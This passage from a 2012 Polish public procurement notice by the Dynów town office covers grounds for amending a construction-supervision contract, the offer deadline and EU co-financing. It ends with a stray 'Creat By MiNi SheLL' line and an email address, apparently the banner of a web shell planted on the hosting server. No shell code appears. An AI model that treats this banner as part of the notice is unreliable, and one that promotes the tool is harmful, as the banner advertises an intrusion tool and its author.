          c ) zaistnienia tzw. siły wyższej (pod tym pojęciem rozumie się definicje zawarte w KC),
              Zmiana terminu wykonania umowy nastąpi o okres równy okresowi trwającej przeszkody,
         d)  zmiany powszechnie obowiązujących przepisów prawa w zakresie mających wpływ
              na realizacje przedmiotu zamówienia lub świadczenia stron,
         e) gdy roboty budowlane objęte umową zostaną wstrzymane przez właściwe organy,  co  uniemożliwia   terminowe wykonanie przedmiotu umowy- termin wykonania przedmiotu umowy będzie przesunięty o czas niezbędny do wykonania robót wynikających z zaleceń właściwych organów,
                   f) zmian terminu realizacji robót budowlanych przez Wykonawcę robót budowlanych o czas niezbędny
                      do wykonania  robót,
      3) zmiana podwykonawców, jeżeli strony umowy zastrzegły wykonanie umowy przy udziale
          podwykonawców,
              4) zmiana osób pełniących obowiązki inspektora nadzoru inwestorskiego na inną osobę legitymująca się
                 co najmniej uprawnieniami wymaganymi do wykazania spełnienia warunków udziału w
                 postępowaniu,
     5) zmiany wynagrodzenia umownego w następstwie zmiany przepisów prawa określających
         wysokość stawki podatku od towarów i usług VAT
 6) gdy zaistnieje niemożliwa do przewidzenia w chwili zawierania umowy okoliczność prawna,
    ekonomiczna lub techniczna, za którą żadna ze stron umowy nie ponosi odpowiedzialności,
    skutkująca brakiem możliwości należytego wykonania umowy,</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> bip.dynow.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski  w Dynowie ; 36-065 Dynów, ul. Rynek 2, pok. nr 4..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 28.06.2012 godzina 08:30, miejsce: Urząd Miejski  w Dynowie ; 36-065 Dynów, ul. Rynek 2, pok. nr 10 (sekretariat).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt współfinansowany ze środków Unii Europejskiej z Europejskiego Funduszu Rozwoju Regionalnego w ramach Regionalnego Programu Operacyjnego Województwa Podkarpackiego na lata 2007 - 2013.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com